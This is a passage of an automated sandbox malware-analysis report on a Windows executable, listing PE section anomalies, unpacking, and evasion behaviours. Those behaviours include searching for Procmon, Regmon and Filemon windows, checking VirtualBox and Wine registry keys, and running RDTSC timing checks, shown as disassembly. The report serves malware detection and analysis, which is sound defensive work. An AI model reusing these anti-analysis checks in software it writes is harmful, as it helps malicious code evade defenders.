Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeSection loaded: kernel.appcore.dllJump to behavior
Source: B43WRnzSPD.exeStatic file information: File size 4441600 > 1048576
Source: B43WRnzSPD.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: B43WRnzSPD.exeStatic PE information: Raw size of acnazlro is bigger than: 0x100000 < 0x1b5400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\B43WRnzSPD.exeUnpacked PE file: 1.2.B43WRnzSPD.exe.600000.0.unpack :EW;.rsrc:W;.idata :W; :EW;acnazlro:EW;qaecibqv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;acnazlro:EW;qaecibqv:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: B43WRnzSPD.exeStatic PE information: real checksum: 0x4409bd should be: 0x4430ba
Source: B43WRnzSPD.exeStatic PE information: section name:
Source: B43WRnzSPD.exeStatic PE information: section name: .idata
Source: B43WRnzSPD.exeStatic PE information: section name:
Source: B43WRnzSPD.exeStatic PE information: section name: acnazlro
Source: B43WRnzSPD.exeStatic PE information: section name: qaecibqv
Source: B43WRnzSPD.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB135 push eax; iretd 1_3_018FB151
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018EC370 pushad ; ret 1_3_018EC371
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB2A3 pushad ; retf 1_3_018FB2B1
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB135 push eax; iretd 1_3_018FB151
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018EC370 pushad ; ret 1_3_018EC371
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB2A3 pushad ; retf 1_3_018FB2B1
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018DAB7B push esi; retn 0047h1_3_018DABFA
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018DAB7B push esi; retn 0047h1_3_018DABFA
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB135 push eax; iretd 1_3_018FB151
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018EC370 pushad ; ret 1_3_018EC371
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB2A3 pushad ; retf 1_3_018FB2B1
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB135 push eax; iretd 1_3_018FB151
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018EC370 pushad ; ret 1_3_018EC371
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018FB2A3 pushad ; retf 1_3_018FB2B1
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018DAB7B push esi; retn 0047h1_3_018DABFA
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_3_018DAB7B push esi; retn 0047h1_3_018DABFA
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_009841D0 push eax; mov dword ptr [esp], edx1_2_009841D5
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00682340 push eax; mov dword ptr [esp], 00000000h1_2_00682343
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_006BC7F0 push eax; mov dword ptr [esp], 00000000h1_2_006BC743
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00640AC0 push eax; mov dword ptr [esp], 00000000h1_2_00640AC4
Source: C:\Users\user\Desktop\B43WRnzSPD.exeCode function: 1_2_00661430 push eax; mov dword ptr [esp], 00000000h1_2_00661433
Source: B43WRnzSPD.exeStatic PE information: section name: acnazlro entropy: 7.955898170729066

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\B43WRnzSPD.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA85EC second address: EA85F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA85F4 second address: EA85FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA85FE second address: EA8611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E8Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA8A61 second address: EA8A7F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F262D38FB0Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA8A7F second address: EA8A95 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F262CBE4E86h 0x00000008 jl 00007F262CBE4E86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA8A95 second address: EA8A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA8D31 second address: EA8D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA8D35 second address: EA8D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA8D3B second address: EA8D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA8D45 second address: EA8D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EA8D4B second address: EA8D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EACAC4 second address: EACB53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or esi, dword ptr [ebp+12A02A6Eh] 0x00000012 push 00000000h 0x00000014 mov ecx, edi 0x00000016 mov edi, dword ptr [ebp+12A029BEh] 0x0000001c push 9E739344h 0x00000021 push ebx 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 pop ebx 0x00000027 add dword ptr [esp], 618C6D3Ch 0x0000002e mov ecx, dword ptr [ebp+12A0346Bh] 0x00000034 push 00000003h 0x00000036 mov di, dx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F262D38FB08h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 jo 00007F262D38FB0Ch 0x0000005b mov edx, dword ptr [ebp+12A02A82h] 0x00000061 jnp 00007F262D38FB09h 0x00000067 push 00000003h 0x00000069 mov edi, dword ptr [ebp+12A01941h] 0x0000006f push 65744C63h 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EACB53 second address: EACB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECC8A9 second address: ECC8DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F262D38FB11h 0x0000000d jne 00007F262D38FB08h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jng 00007F262D38FB06h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push edi 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECC8DA second address: ECC8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECA705 second address: ECA709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECA709 second address: ECA71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F262CBE4E8Eh 0x0000000e push esi 0x0000000f pop esi 0x00000010 jne 00007F262CBE4E86h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECA89A second address: ECA901 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F262D38FB0Ah 0x00000008 jmp 00007F262D38FB15h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F262D38FB19h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b pushad 0x0000001c jng 00007F262D38FB06h 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 jmp 00007F262D38FB16h 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECA901 second address: ECA907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECAA43 second address: ECAA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECAE5B second address: ECAE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F262CBE4E86h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F262CBE4E8Fh 0x00000017 push edi 0x00000018 pop edi 0x00000019 jno 00007F262CBE4E86h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECAE85 second address: ECAE90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F262D38FB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECAE90 second address: ECAE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECAE98 second address: ECAE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB544 second address: ECB563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F262CBE4E8Eh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F262CBE4E86h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB563 second address: ECB567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB567 second address: ECB578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F262CBE4E86h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB6BB second address: ECB6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB6DF second address: ECB6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F262CBE4E86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB6EB second address: ECB6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F262D38FB06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB6F6 second address: ECB6FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB6FC second address: ECB700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EC36DF second address: EC36ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E8Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EC36ED second address: EC36F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB9C6 second address: ECB9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECB9CE second address: ECB9D8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F262D38FB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECBFDB second address: ECBFDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECBFDF second address: ECC001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F262D38FB0Eh 0x0000000c jnp 00007F262D38FB06h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECC001 second address: ECC005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECC6D7 second address: ECC6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F262D38FB06h 0x0000000d jmp 00007F262D38FB0Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ECC6EE second address: ECC726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E97h 0x00000007 jmp 00007F262CBE4E8Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push edx 0x00000010 pushad 0x00000011 jns 00007F262CBE4E86h 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ED7B53 second address: ED7B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ED70B8 second address: ED70C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: ED7855 second address: ED787B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F262D38FB06h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F262D38FB18h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDA53B second address: EDA541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDA541 second address: EDA546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDA546 second address: EDA54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDA54C second address: EDA5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 02E2A7DAh 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F262D38FB08h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 call 00007F262D38FB09h 0x0000002d jne 00007F262D38FB0Ah 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jnl 00007F262D38FB13h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDAB73 second address: EDAB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 js 00007F262CBE4E86h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDACDE second address: EDACF4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDACF4 second address: EDACFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDB0B5 second address: EDB0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDB314 second address: EDB322 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDB322 second address: EDB326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDB326 second address: EDB32A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDB32A second address: EDB330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDB668 second address: EDB686 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F262CBE4E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F262CBE4E92h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDB715 second address: EDB719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDBB64 second address: EDBBC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F262CBE4E93h 0x00000010 jmp 00007F262CBE4E8Fh 0x00000015 popad 0x00000016 nop 0x00000017 mov edi, dword ptr [ebp+12A02ACEh] 0x0000001d push 00000000h 0x0000001f jnp 00007F262CBE4E86h 0x00000025 push 00000000h 0x00000027 mov di, si 0x0000002a xchg eax, ebx 0x0000002b jng 00007F262CBE4E90h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDC558 second address: EDC55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDE1FE second address: EDE214 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F262CBE4E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F262CBE4E88h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDE9C7 second address: EDE9D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDE9D1 second address: EDE9DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F262CBE4E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EDF682 second address: EDF68C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F262D38FB06h 0x0000000a rdtsc
